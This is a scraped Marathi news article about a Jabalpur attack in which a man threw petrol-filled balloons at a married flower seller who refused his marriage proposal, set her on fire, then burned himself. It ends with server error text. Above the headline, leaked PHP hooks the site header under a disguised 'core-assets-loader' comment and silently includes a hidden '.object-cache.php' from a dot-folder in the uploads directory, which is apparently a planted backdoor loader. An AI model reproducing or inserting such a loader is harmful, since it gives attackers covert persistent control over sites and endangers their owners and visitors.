add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Crime News: फूल विक्रेत्या महिलेवर पेट्रोल भरलेले फुगे फेकले, मग जिवंत पेटवले; बाजारातील घटनेनं खळबळ – SOCH INDIA
Menu

देश
Crime News: फूल विक्रेत्या महिलेवर पेट्रोल भरलेले फुगे फेकले, मग जिवंत पेटवले; बाजारातील घटनेनं खळबळ

nobanner

मध्य प्रदेशच्या जबलपूरमध्ये एक धक्कादायक घटना घडली आहे. एका माथेफिरुनं महिलेवर पेट्रोल टाकून तिला पेटवून दिलं. यानंतर महिला जिवंत जळू लागली. मग आरोपीनं स्वत:वर पेट्रोल ओतलं आणि पेटवून घेतलं. या घटनेनं बाजारात खळबळ उडाली. आसपास असलेल्या लोकांनी कशीबशी आग विझवली आणि दोघांना रुग्णालयात दाखल केलं. पोलिसांनी या प्रकरणाचा तपास सुरु केला आहे. त्यातून आरोपी पुरुष आणि पीडित महिलेबद्दल महत्त्वाची माहिती उघडकीस आली आहे.

रांझी पोलीस ठाण्याच्या हद्दीत येणाऱ्या मस्ताना चौकात ही घटना घडली. एका माथेफिरु प्रियकरानं महिलेवर पेट्रोल टाकून तिला पेटवून दिलं. पीडित महिलेचं मस्ताना चौकात पुष्पहारांचं दुकान आहे. महिला दुकानात बसलेली असताना याच परिसरात राहणारा नरेंद्र पुजारी तिच्या दुकानात गेला. त्यानं तिच्यासमोर लग्नाचा प्रस्ताव ठेवला. त्यावरुन दोघांमध्ये वाद झाला.

महिलेनं लग्नाचा प्रस्ताव फेटाळून लावला. तिनं लग्न करण्यास स्पष्ट शब्दांत नकार दिला. त्यानंतर नरेंद्रनं पेट्रोलनं भरलेले दोन फुगे खिशातून काढले आणि महिलेवर फेकले. त्यानंतर त्यानं महिलेला पेटवून दिलं. महिला जिवंत जळू लागताच नरेंद्रनं स्वत:वर पेट्रोल ओतलं आणि आग लावून घेतली. आसपासच्या लोकांनी आग विझवली आणि दोघांना रुग्णालयात दाखल केलं. दोघांवर उपचार सुरु आहेत.

घटनेची माहिती पोलिसांना देण्यात आली. त्यानंतर पोलीस घटनास्थळी पोहोचले. त्यांनी घटनास्थळाचा आढावा घेतला. ४२ वर्षीय महिला आणि आरोपी नरेंद्र पंजाबी यांच्यात प्रेम संबंध असल्याची माहिती पोलिसांनी दिली. महिला विवाहित आहे. त्यामुळे तिनं नरेंद्रसोबत लग्न करण्यास नकार दिला. पण वारंवार सांगूनही नरेंद्र ऐकला नाही, असं पोलिसांनी सांगितलं.

गेल्या काही दिवसांपासून नरेंद्र महिलेवर सातत्यानं लग्नासाठी दबाव टाकत होता. त्यामुळे तिनं पोलीस तक्रारही दाखल केली होती. आता पोलिसांनी या प्रकरणात नरेंद्र विरोधात गुन्हा नोंदवला आहे. रुग्णालयातून डिस्चार्ज मिळाल्यानंतर त्याला अटक करण्यात येईल. भर बाजारात घडलेल्या या घटनेमुळे परिसरात खळबळ उडाली आहे.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.